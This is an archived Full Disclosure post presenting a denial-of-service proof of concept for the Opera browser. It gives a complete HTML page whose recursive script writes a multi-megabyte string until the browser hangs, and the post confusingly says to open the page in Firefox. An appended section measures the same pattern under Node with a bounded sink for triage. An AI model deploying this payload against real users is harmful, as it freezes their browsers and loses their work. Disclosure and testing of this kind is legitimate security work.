Full Disclosure mailing list archives
Opera (plenitude String )Denial of Service Exploit
From: information security <informationhacker08 () gmail com>
Date: Tue, 2 Mar 2010 20:04:19 -0800
======================================================================
Opera (plenitude String )Denial of Service Exploit
======================================================================

by Asheesh Kumar Mani Tripathi

# code by Asheesh kumar Mani Tripathi
# email informationhacker08 () gmail com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda

#Download
http://www.opera.com/download/

#Background
Opera is a popular internet browser :)

#Vulnerability
This bug is a typical result when an attacker tries to write plenitude String in the document.write() function. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

#Impact
Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost.

#Proof of concept
Copy the code into a text file and save as "asheesh.html" open in Mozilla Firefox

======================================================================
asheesh.html
======================================================================
<html>
<title>asheesh kumar mani tripathi</title>
Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh () {
    var i , anaconda = "XXXX"
    for(i=24;i >0 ;--i) {
        anaconda=anaconda+anaconda;
    }
    document.write(anaconda);
    asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
======================================================================

Why do you worry without cause? Whom do you fear without reason? Who can kill you? The soul is neither born, nor does it die.

#If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
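For triage, the resource demand of the pattern in the post can be measured outside a browser. The following is an added example, not part of the original post: it runs the same doubling-and-recursion pattern against a budgeted stand-in for document.write under Node. The names makeBoundedSink, runPattern and measure, and the limits used, are assumptions made for illustration.

```javascript
// Added example, not from the original post. The sink stands in for
// document.write; all names and limits here are illustrative assumptions.
class BudgetExceeded extends Error {}

// Sink that accepts writes until a character or call budget is spent.
function makeBoundedSink(maxChars, maxCalls) {
  let chars = 0;
  let calls = 0;
  return {
    write(text) {
      if (calls + 1 > maxCalls) {
        throw new BudgetExceeded(`call budget of ${maxCalls} spent`);
      }
      if (chars + text.length > maxChars) {
        throw new BudgetExceeded(`write of ${text.length} chars over budget`);
      }
      calls += 1;
      chars += text.length;
    },
    stats: () => ({ chars, calls }),
  };
}

// The post's pattern: double a seed `rounds` times, write it, recurse.
// Only payload.length is inspected; nothing is rendered.
function runPattern(sink, seed, rounds) {
  let payload = seed;
  for (let i = rounds; i > 0; --i) payload = payload + payload;
  sink.write(payload); // throws once a budget is spent
  runPattern(sink, seed, rounds);
}

// Run the pattern under both budgets and report how far it got.
function measure(seed, rounds, maxChars, maxCalls) {
  const sink = makeBoundedSink(maxChars, maxCalls);
  let stoppedBy = null;
  try {
    runPattern(sink, seed, rounds);
  } catch (err) {
    if (!(err instanceof BudgetExceeded)) throw err;
    stoppedBy = err.message;
  }
  return { ...sink.stats(), stoppedBy };
}

// Values from the post: "XXXX" doubled 24 times is 4 * 2^24 chars per write.
console.log(measure("XXXX", 24, 1 << 20, 100));
// Constructed variant: each write fits, so the unbounded recursion trips the call budget.
console.log(measure("XXXX", 4, 1 << 20, 100));
```

With the post's values the very first write asks for 67,108,864 characters, so the character budget stops it before anything is accepted; with the smaller constructed seed it is the recursion that exhausts the call budget.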